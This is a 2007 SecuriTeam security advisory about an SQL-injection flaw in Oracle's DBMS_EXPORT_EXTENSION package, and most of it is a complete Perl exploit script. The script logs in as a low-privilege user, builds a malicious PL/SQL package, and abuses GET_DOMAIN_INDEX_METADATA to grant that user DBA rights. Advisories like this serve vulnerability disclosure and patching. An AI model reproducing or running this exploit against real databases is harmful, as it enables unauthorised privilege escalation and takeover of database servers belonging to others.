[EXPL] Oracle DBMS_EXPORT_EXTENSION SQL Injection Vulnerability

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Oracle DBMS_EXPORT_EXTENSION SQL Injection Vulnerability
------------------------------------------------------------------------


SUMMARY

Oracle is prone to an SQL-injection vulnerability. An attacker could
exploit this to gain DBA privileges. The following exploit code will cause
Oracle to grant the user connecting to the server SYSTEM privileges.

DETAILS

Exploit:
#!/usr/bin/perl
#
# Remote Oracle dbms_export_extension exploit (any version)
# Grant or revoke dba permission to unprivileged user
#
# Tested on Oracle 10g - Release 10.2.0.1.0
# Oracle 9i - Release 9.2.0.2.0
#
# REF: http://www.securityfocus.com/bid/17699
#
# AUTHOR: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com
#
# DATE: Copyright 2007 - Sun Feb 4 15:53:04 CET 2007
#
# Oracle InstantClient (basic + sdk) required for DBD::Oracle
#
use warnings;
use strict;
use DBI;
use DBD::Oracle;
use Getopt::Std;
use vars qw/ %opt /;

sub usage {
print <<"USAGE";

Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> [-g|-r]

Options:
-h <host> target server address
-s <sid> target sid name
-u <user> user
-p <passwd> password

-g|-r (g)rant dba to user | (r)evoke dba from user

USAGE
exit 0
}

my $opt_string = 'h:s:u:p:v:gr';
getopts($opt_string, \%opt) or &usage;
&usage unless ( $opt{h} or $opt{s} or $opt{u} or $opt{p} );
&usage if ( !$opt{g} and !$opt{r} );
my $user = uc $opt{u};

my $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u},
$opt{p}) or die;


my $sqlcmd = undef;
$sqlcmd = "GRANT DBA TO $user" if ($opt{g});
$sqlcmd = "REVOKE DBA FROM $user" if ($opt{r});

print "[-] Wait...\n";
$dbh->{RaiseError} = 1;

if ( $dbh->do( qq{
CREATE OR REPLACE PACKAGE BUNKERPKG AUTHID CURRENT_USER IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv) RETURN NUMBER;
END;
} ) ) {}
elsif ( 6550 != $dbh->err ) { die $dbh->errstr; }
else {
my $msg = $dbh->func( 'plsql_errstr' );
die $dbh->errstr if not defined $msg;
die $msg if $msg;
}
print "[-] Building evil package\n";

if ( $dbh->do(qq{
CREATE OR REPLACE PACKAGE BODY BUNKERPKG IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv) RETURN NUMBER IS
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE '$sqlcmd';
COMMIT;
RETURN(1);
END;
END;
} ) ) {}
elsif ( 6550 != $dbh->err ) { die $dbh->errstr; }
else {
my $msg = $dbh->func( 'plsql_errstr' );
die $dbh->errstr if not defined $msg;
die $msg if $msg;
}
print "[-] Finishing evil package\n";

if ( $dbh->do (qq{
DECLARE
INDEX_NAME VARCHAR2(200);
INDEX_SCHEMA VARCHAR2(200);
TYPE_NAME VARCHAR2(200);
TYPE_SCHEMA VARCHAR2(200);
VERSION VARCHAR2(200);
NEWBLOCK PLS_INTEGER;
GMFLAGS NUMBER;
v_Return VARCHAR2(200);
BEGIN
INDEX_NAME := 'A1';
INDEX_SCHEMA := '$user';
TYPE_NAME := 'BUNKERPKG';
TYPE_SCHEMA := '$user';
VERSION := '';
GMFLAGS := 1;
v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(
INDEX_NAME => INDEX_NAME, INDEX_SCHEMA => INDEX_SCHEMA, TYPE_NAME
-> TYPE_NAME,
TYPE_SCHEMA => TYPE_SCHEMA, VERSION => VERSION, NEWBLOCK =>
NEWBLOCK, GMFLAGS => GMFLAGS
);
END;
} ) ) {}
elsif ( 6550 != $dbh->err ) { die $dbh->errstr; }
else {
my $msg = $dbh->func( 'plsql_errstr' );
die $dbh->errstr if not defined $msg;
die $msg if $msg;
}
print "[-] YOU GOT THE POWAH!!\n";

exit;


ADDITIONAL INFORMATION

The information has been provided by <mailto:bunker@xxxxxxxxxxxxx> Andrea
"bunker" Purificato.
The original article can be found at:
<http://rawlab.mindcreations.com/codes/exp/oracle/dbms_exp_ext.pl>
http://rawlab.mindcreations.com/codes/exp/oracle/dbms_exp_ext.pl



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages